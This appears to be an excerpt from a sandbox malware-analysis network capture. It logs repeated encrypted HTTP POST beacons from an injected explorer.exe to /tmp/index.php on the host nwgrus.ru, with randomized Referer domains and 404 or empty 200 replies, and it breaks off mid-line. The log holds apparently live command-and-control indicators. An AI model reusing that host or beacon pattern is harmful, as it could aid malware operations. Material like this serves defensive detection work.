Oct 11, 2024 06:37:26.087151051 CEST	279	OUT	Data Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 32 0b ef 89 Data Ascii: ;nTfa!uu}wb~\|E[Xm+? 9Yt M@NA .[k,vu2=;"H2\|cX9G0G9;5mI%V_l0y]9=ZhH14XYmicBf0mX4+[f
Oct 11, 2024 06:37:27.330255032 CEST	152	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 11 Oct 2024 04:37:27 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 04 00 00 00 72 e8 87 ee Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	50550	116.58.10.60	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 06:37:27.339456081 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://uwmajrkjinpjtb.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 328 Host: nwgrus.ru
Oct 11, 2024 06:37:27.339489937 CEST	328	OUT	Data Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 64 49 c1 a2 Data Ascii: ;nTfa!uu}wb~\|E[Xm+? 9Yt M@NA -[k,vudIiOuimR3opPe~qN]&/]TtwW2{c2a7I\g&v(0OWZhe{kRZS/@P`8
Oct 11, 2024 06:37:28.608561039 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 11 Oct 2024 04:37:28 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	50551	116.58.10.60	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 06:37:28.617679119 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vdgnwysksin.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 122 Host: nwgrus.ru
Oct 11, 2024 06:37:28.617714882 CEST	122	OUT	Data Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 2b 0d df 8f Data Ascii: ;nTfa!uu}wb~\|E[Xm+? 9Yt M@NA -[k,vu+9Wo\|KW5n8IpLc
Oct 11, 2024 06:37:29.865607023 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 11 Oct 2024 04:37:29 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	50552	116.58.10.60	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 06:37:29.875168085 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mnxigvfksbogudg.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 335 Host: nwgrus.ru
Oct 11, 2024 06:37:29.875199080 CEST	335	OUT	Data Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 35 31 fe a6 Data Ascii: ;nTfa!uu}wb~\|E[Xm+? 9Yt M@NA -[k,vu51RaZEke_iY9_e`+(eUI%X_2<+P:sD<G=w$]Q\'\|Z,Khm\D>G5s
Oct 11, 2024 06:37:31.120218039 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Fri, 11 Oct 2024 04:37:30 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	50553	116.58.10.60	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 06:37:31.128701925 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://kixruudymeg.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 188 Host: nwgrus.ru
Oct 11, 2024 06:37:31.128739119 CEST	188	OUT	Data Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 4e 49 ad ab Data Ascii: ;nTfa!uu}wb~\|E[Xm+? 9Yt M@NA -[k,vuNIU6ztXt3L?^b{UL&dn~.-Lv9]U`96p M@Vr6I
Oct 11, 2024 06:37:32.624485970 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 11 Oct 2024 04:37:32 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	50554	116.58.10.60	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 06:37:32.636657000 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://noqnaadfmcqiqh.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 286 Host: nwgrus.ru
Oct 11, 2024 06:37:32.636657000 CEST	286	OUT	Data Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 75 44 e0 e8 Data Ascii: ;nTfa!uu}wb~\|E[Xm+? 9Yt M@NA -[k,vuuDWFZE3w,6w$ZBE#9CG@I6APg)/1n=YW25q\=Nn'U[H\FFhWs
Oct 11, 2024 06:37:33.887737036 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Fri, 11 Oct 2024 04:37:33 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	50555	116.58.10.60	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 06:37:33.895883083 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xgcqobnogyn.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 212 Host: nwgrus.ru
Oct 11, 2024 06:37:33.895915985 CEST	212	OUT	Data Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 44 01 f9 fd Data Ascii: ;nTfa!uu}wb~\|E[Xm+? 9Yt M@NA -[k,vuDj=nkfSVQ0&=/bI{bB! b?AfrjvyJ eH?tl=S1]`8A
Oct 11, 2024 06:37:35.170355082 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Fri, 11 Oct 2024 04:37:34 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	50556	116.58.10.60	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 06:37:35.178427935 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://tkdovmgcqkpkau.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 354 Host: nwgrus.ru
Oct 11, 2024 06:37:35.178427935 CEST	354	OUT	Data Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 76 2e d9 f7 Data Ascii: ;nTfa!uu}wb~\|E[Xm+? 9Yt M@NA -[k,vuv.n`T`4Y2<sMe"7W6GW,kM7*^,L0w\]ta0(5F0+oayzPiP"\)
Oct 11, 2024 06:37:36.455070019 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 11 Oct 2024 04:37:36 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	50557	116.58.10.60	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 06:37:36.468993902 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jdcljhdxiwgilrm.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 321 Host: nwgrus.ru
Oct 11, 2024 06:37:36.469016075 CEST	321	OUT	Data Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 7a 22 ff b6 Data Ascii: ;nTfa!uu}wb~\|E[Xm+? 9Yt M@NA -[k,vuz"XAkBeD [f3*DZMbDBP)]MrWD`34vq\|EW'f#Tyc"YE=fd&NS!'
Oct 11, 2024 06:37:37.717370033 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 11 Oct 2024 04:37:37 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	50558	116.58.10.60	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 06:37:37.730607986 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ktpfbekvdosn.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 311 Host: nwgrus.ru
Oct 11, 2024 06:37:37.730640888 CEST	311	OUT	Data Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 63 3d a0 b9 Data Ascii: ;nTfa!uu}wb~\|E[Xm+? 9Yt M@NA -[k,vuc=Z\U^f>XS?{UZ"N\amMPJ;M}nHNr;sz"+DQxO+ZUzNX{
Oct 11, 2024 06:37:39.029239893 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Fri, 11 Oct 2024 04:37:38 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	50559	116.58.10.60	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 06:37:39.037609100 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://egphyymsnbbon.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 279 Host: nwgrus.ru
Oct 11, 2024 06:37:39.037609100 CEST	279	OUT	Data Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 43 43 d7 bd Data Ascii: ;nTfa!uu}wb~\|E[Xm+? 9Yt M@NA -[k,vuCCbTace:\|0rvFYU'J]$=k=8H\71\1%<xMJ6G/wv<*kA6a8
Oct 11, 2024 06:37:40.278882980 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 11 Oct 2024 04:37:40 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	50560	116.58.10.60	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 06:37:40.286746979 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://aedejmbyprcj.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 307 Host: nwgrus.ru
Oct 11, 2024 06:37:40.286782026 CEST	307	OUT	Data Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 28 37 ca ea Data Ascii: ;nTfa!uu}wb~\|E[Xm+? 9Yt M@NA -[k,vu(7Mw~L>#RF:$vAfNe1#QY6GE0t"PkQT>EPkePoK0n6RxmTEcr>_J3
Oct 11, 2024 06:37:41.537832975 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 11 Oct 2024 04:37:41 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument 